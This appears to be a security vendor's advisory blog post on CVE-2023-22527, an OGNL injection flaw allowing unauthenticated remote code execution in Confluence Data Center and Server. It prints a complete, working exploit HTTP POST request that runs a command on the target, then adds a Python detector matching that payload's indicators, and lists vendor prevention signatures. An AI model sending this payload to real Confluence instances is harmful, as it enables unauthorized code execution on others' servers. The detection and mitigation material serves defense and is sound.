CVE-2023-22527: Another OGNL Injection Leads to RCE in Atlassian Confluence


On January 16, 2024, Atlassian disclosed a remote code execution vulnerability affecting Confluence Data Center and Confluence Server [1]. CVE-2023-22527 is an OGNL injection vulnerability with a CVSS score of 10 (Critical). Although patches are available, thousands of outdated Atlassian Confluence instances remain publicly exposed, posing significant risk to organizations.

In this blog, we explain how the Atlassian Confluence CVE-2023-22527 exploit works and how organizations can defend against CVE-2023-22527 attacks.


Atlassian Confluence CVE-2023-22527 Vulnerability Explained

Atlassian Confluence is a collaboration and documentation platform designed to facilitate communication and information sharing within organizations. Confluence Server is a self-hosted version of the platform, allowing organizations to deploy it on their own servers or cloud infrastructure. Confluence Data Center, on the other hand, is an enterprise-grade solution designed for organizations with larger user bases or those with a need for high availability and reliability. On January 16, 2024, Atlassian disclosed an OGNL injection vulnerability affecting the Confluence Data Center and Confluence Server. Adversaries may exploit the CVE-2023-22527 vulnerability for unauthenticated remote code execution in vulnerable Confluence instances. The vulnerability has a CVSS score of 10 (Critical). The affected versions are listed below.

Affected Product                     Affected Versions
Confluence Data Center and Server    8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3

According to ShadowServer, there are over 11,000 Atlassian Confluence instances publicly exposed, and adversaries are actively scanning for vulnerable instances [2]. Organizations are advised to patch their Atlassian Confluence instances as soon as possible.

Previously, in September 2021 and June 2022, two separate OGNL injection vulnerabilities were found in Atlassian Confluence. For more detailed information, you can check our "Atlassian Confluence Zero-Day CVE-2022-26134 Vulnerability" and "Atlassian Confluence CVE-2021-26084 Vulnerability" blog posts.

What is an OGNL Injection Attack?

Object-Graph Navigation Language (OGNL) is a Java-based expression language commonly employed in frameworks and applications such as Apache Struts and Atlassian Confluence. OGNL provides a concise syntax for expressing complex operations on Java objects, enabling developers to access and manipulate properties, invoke methods, and navigate object relationships in an expressive manner.

When applications do not properly validate and sanitize user input before using it in OGNL expressions, it may lead to a security vulnerability called OGNL injection. In OGNL injection attacks, adversaries input specially crafted strings containing OGNL expressions into user interfaces or input fields. When the application processes this input without proper validation, the injected OGNL expressions get executed within the application's context. This can lead to a range of security issues, including unauthorized access to sensitive data and remote code execution.

How Does the Atlassian Confluence CVE-2023-22527 Exploit Work?

The Atlassian Confluence CVE-2023-22527 vulnerability is an OGNL injection vulnerability that allows unauthenticated adversaries to execute arbitrary commands remotely on a vulnerable Confluence instance. The vulnerability stems from a Velocity template file named "text-inline.vm" [3]. Through this template, adversaries can reach the OGNL evaluator with the expression "#request['.KEY_velocity.struts2.context'].internalGet('ognl')" and execute commands. An example payload delivered via an HTTP POST request is given below.

//Attacker-crafted POST request

POST /template/aui/text-inline.vm HTTP/1.1
Host: <vulnerable_Confluence_instance>
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 243

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,%7b%7d)%2b\u0027&x=(new freemarker.template.utility.Execute()).exec(%7b%22whoami%22%7d)

Atlassian Confluence CVE-2023-22527 Vulnerability Exploit Example
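As an added illustration (not code from the original post or from Picus), the following Python snippet shows how a defender can normalize a logged request body, undoing the URL percent-encoding and the Java-style \uXXXX escapes seen in the payload above, before matching it against the indicators that payload contains. The sample log entries are constructed; the first reuses the request shown on this page.

```python
import re
import urllib.parse

# Indicators taken from the CVE-2023-22527 request shown on this page.
VULNERABLE_PATH = "/template/aui/text-inline.vm"
OGNL_MARKERS = (
    ".KEY_velocity.struts2.context",        # Struts 2 context handle used to reach OGNL
    ".internalGet('ognl')",                  # OGNL evaluator pulled out of that context
    "freemarker.template.utility.Execute",  # class used as the command-execution sink
)
_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

def normalize(body: str) -> str:
    """Undo both encoding layers of the payload before matching.
    Layer 1: URL percent-encoding (%2b, %7b, %22 ...).
    Layer 2: Java-style \\uXXXX escapes (\\u0027 is the quote character).
    The loop also resolves a body whose escapes were encoded more than once."""
    decoded = urllib.parse.unquote_plus(body)
    prev = None
    while prev != decoded:
        prev = decoded
        decoded = _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), decoded)
    return decoded

def inspect_request(method: str, path: str, body: str) -> dict:
    """Verdict for one request from a proxy/WAF log, listing the indicators that hit."""
    normalized = normalize(body)
    matched = [m for m in OGNL_MARKERS if m in normalized]
    velocity_path = path.split("?", 1)[0].endswith(".vm")
    # A POST to any Velocity template whose body reaches into #request is worth
    # alerting on even when the final sink class differs from the one shown above.
    suspicious = bool(matched) or (method == "POST" and velocity_path and "#request[" in normalized)
    return {"suspicious": suspicious, "velocity_path": velocity_path, "matched": matched}

# Constructed sample log entries: the page's request plus two benign ones.
SAMPLE_REQUESTS = [
    ("POST", VULNERABLE_PATH,
     r"label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d"
     r".internalGet(\u0027ognl\u0027).findValue(#parameters.x,%7b%7d)%2b\u0027"
     r"&x=(new freemarker.template.utility.Execute()).exec(%7b%22whoami%22%7d)"),
    ("POST", "/dologin.action", "os_username=alice&os_password=%2bsecret%2b"),
    ("GET", "/display/DOCS/Home", ""),
]

def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return the path of every request that should raise an alert."""
    return [path for method, path, body in requests
            if inspect_request(method, path, body)["suspicious"]]
```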

How Does Picus Help Simulate Atlassian Confluence CVE-2023-22527 Attacks?

We also strongly suggest simulating the Atlassian Confluence CVE-2023-22527 Vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Citrix Bleed, Follina, and Log4Shell, within minutes with a 14-day free trial of the Picus Platform.

The Picus Threat Library includes the following threat for Atlassian Confluence CVE-2023-22527 vulnerability exploitation attacks:

Threat ID   Threat Name                                 Attack Module
58423       Atlassian Confluence Web Attack Campaign    Web Application

Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures that address the Atlassian Confluence CVE-2023-22527 vulnerability and other vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs has validated the following signatures for the Atlassian Confluence CVE-2023-22527 vulnerability (a dash marks a signature ID that was not listed):

Security Control          Signature ID                       Signature Name
Check Point NGFW          asm_dynamic_prop_CVE_2023_22527    Atlassian Confluence Template Injection (CVE-2023-22527)
Citrix                    999956                             an error in value conversion in apache struts 2 before 2.2.3.1 could lead to ognl rce via http form field
F5 BIG-IP                 200004274                          FreeMarker Template Injection template.utility (Parameter)
Forcepoint NGFW           -                                  HTTP_CRL-Confluence-Template-Injection-CVE-2023-22527
Fortiweb                  060050053                          Generic Attacks(Extended)
Imperva SecureSphere      -                                  Template Injection - 6
Modsecurity               932100                             Remote Command Execution: Unix Command Injection
Palo Alto                 92195                              FreeMarker Server Side Template Injection Vulnerability
Snort                     1.1002.19                          SERVER-IIS cmd.exe access
Trend Micro TippingPoint  43721                              HTTP: Atlassian Confluence Data Center and Server Template Injection Vulnerability

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Complete Security Validation Platform.

References

[1] "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server." Available: https://confluence.atlassian.com/. [Accessed: Jan. 23, 2024]

[2] Shadowserver, post on Twitter. Available: https://twitter.com/Shadowserver/status/1749372138685915645

[3] R. Maini, "Atlassian Confluence - Remote Code Execution (CVE-2023-22527)," ProjectDiscovery Blog, Jan. 22, 2024. Available: https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/. [Accessed: Jan. 23, 2024]